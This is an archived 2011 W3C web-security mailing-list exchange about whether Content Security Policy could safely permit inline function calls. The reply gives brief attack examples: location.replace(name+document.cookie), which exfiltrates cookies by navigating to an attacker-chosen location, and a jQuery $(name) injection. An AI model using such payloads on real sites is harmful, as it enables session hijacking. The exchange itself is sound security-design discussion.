- From: <sird@rckc.at>
- Date: Wed, 23 Feb 2011 22:45:13 -0800
- To: Devdatta Akhawe <dev.akhawe@gmail.com>
- Cc: public-web-security@w3.org
humm that's still bad right? location.replace(name+document.cookie) for example If you wish to keep CSP safe, don't allow this =/ Greetz!! PS. even if it's only users functions, something like $(name) in a page with jquery is enough. -- Eduardo On Wed, Feb 23, 2011 at 7:52 PM, Devdatta Akhawe <dev.akhawe@gmail.com> wrote: > Hi > > CSP currently blocks all inline scripts and we have seen a lot of > discussion about it. > > Have we considered only allowing inline functions calls as a option -- > a middle ground between inline-scripts being enabled and disabled. I.E > > <script> function(arg1,arg2,arg3) </script> > > will be allowed inline, no other inline script execution will be > allowed. You still won't be able to do <script> .. javascript ... > </script>. > > The CSP spec at Mozilla > (https://wiki.mozilla.org/Security/CSP/Specification) already makes a > distinction between arbitrary code being eval'ed and function calls. > For example, setTimeout is allowed with function names as arguments > but not with strings. It seems this is similar. > > I feel like this simple change will make retrofitting legacy > applications with CSP much easier. > > My apologies if this has already been proposed. It would be great if > someone can point me to the discussion. > > cheers > devdatta > >
Received on Thursday, 24 February 2011 06:46:06 UTC